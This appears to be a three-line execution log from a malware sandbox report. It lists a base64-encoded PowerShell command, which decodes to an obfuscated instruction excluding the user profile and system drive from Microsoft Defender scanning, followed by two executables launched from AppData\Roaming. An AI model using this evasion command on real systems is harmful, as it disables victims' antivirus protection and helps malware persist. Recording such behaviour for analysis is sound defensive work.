- open powershell -EncodedCommand "PAAjAHoAcwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZwB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZgBjACMAPgA="
- open C:\Users\Xcqunmbw\AppData\Roaming\subdir.exe
- open C:\Users\Xcqunmbw\AppData\Roaming\system.exe